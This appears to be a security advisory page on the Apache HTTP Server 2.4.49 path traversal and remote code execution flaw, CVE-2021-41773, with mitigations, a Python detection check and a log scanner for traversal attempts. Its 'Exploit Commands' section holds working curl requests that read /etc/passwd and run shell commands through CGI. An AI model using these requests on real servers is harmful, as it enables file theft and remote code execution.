Apache HTTP Server, Path Traversal & Remote Code Execution, CVE-2021-41773 (Critical)

How the CVE Works:

CVE-2021-41773 is a critical vulnerability in Apache HTTP Server 2.4.49 caused by improper path normalization. A flaw in the `ap_normalize_path()` function lets crafted URLs (e.g., `/icons/.%%32%65/`) traverse outside restricted directories. If the files reached this way are not protected by `Require all denied` (for example, because `Require all granted` is applied too broadly), the result is arbitrary file disclosure. Where CGI scripts are enabled, further exploitation leads to RCE. The root cause is incomplete checking of URL-encoded characters (%2e, %5c), which permits access to unintended files.

DailyCVE Form:

Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal → RCE
Severity: Critical
Date: 2021-10-05

What Undercode Says:

Analytics:

  • Affects 2.4.49 only; patched in 2.4.50.
  • Exploits surged within 24 hours of disclosure.
  • Shodan shows ~200k vulnerable servers pre-patch.

Exploit Commands:

1. File Disclosure:

curl -v "http://target/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"

2. RCE (if CGI enabled):

curl -X POST "http://target/cgi-bin/.%2e/%2e%2e/bin/sh" -d "echo;id"

Mitigation Commands:

1. Patch Upgrade:

sudo apt update && sudo apt upgrade apache2 -y

2. Temp Fix (mod_rewrite):

RewriteEngine On
# Refuse (403 Forbidden) any request whose path contains "../"
RewriteRule "\.\./" "-" [F]

Detection Code (Python):

import requests

# Request the encoded traversal path and look for passwd-style content in the reply
vuln_url = "http://target/icons/.%%32%65/"
response = requests.get(vuln_url, timeout=10)
if response.status_code == 200 and "root:x:" in response.text:
    print("[!] Vulnerable to CVE-2021-41773")

Protection Steps:

1. Disable `mod_cgi` if unused.

2. Enforce `Require all denied` in untrusted directories.

3. Audit logs for `/%2e` or `/..` patterns.
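
One way to carry out step 3, as an added example that is not from the original page: a scanner that percent-decodes each logged request path repeatedly, so `.%2e` and the double-encoded `.%%32%65` both resolve to `..`, and reports the response status for triage. The log lines, addresses and function names are constructed for illustration and assume Apache's combined log format.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [06/Oct/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Oct/2021:10:01:05 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1421 "-" "curl/7.68.0"
198.51.100.7 - - [06/Oct/2021:10:01:09 +0000] "POST /cgi-bin/.%2e/%2e%2e/bin/sh HTTP/1.1" 403 199 "-" "curl/7.68.0"
203.0.113.4 - - [06/Oct/2021:10:02:11 +0000] "GET /icons/.%%32%65/ HTTP/1.1" 400 226 "-" "python-requests/2.26.0"
192.0.2.10 - - [06/Oct/2021:10:03:00 +0000] "GET /downloads/..archive/readme.txt HTTP/1.1" 200 90 "-" "Mozilla/5.0"
"""

# client IP, method, raw request path, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def fully_decode(path, max_rounds=5):
    """Percent-decode until stable so nested encodings collapse (%%32%65 -> %2e -> .)."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def is_traversal(raw_path):
    """True if the decoded path has a '..' segment ('/' or '\\' as separator)."""
    path = fully_decode(raw_path.split("?", 1)[0]).replace("\\", "/")
    return ".." in path.split("/")

def scan(log_text):
    """Return one finding per log line whose request path contains a traversal segment."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and is_traversal(m.group(3)):
            ip, method, path, status = m.groups()
            # A 200 means the server answered the request: review those first.
            findings.append({"ip": ip, "method": method, "path": path,
                             "status": int(status), "served": status == "200"})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        tag = "SERVED" if f["served"] else "blocked"
        print(f'{tag:8} {f["status"]} {f["ip"]} {f["method"]} {f["path"]}')
```

Matching on whole `..` path segments after decoding avoids flagging names such as `..archive`, which a plain search for `/..` would report.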

References:

Sources:

Reported By: www.cve.org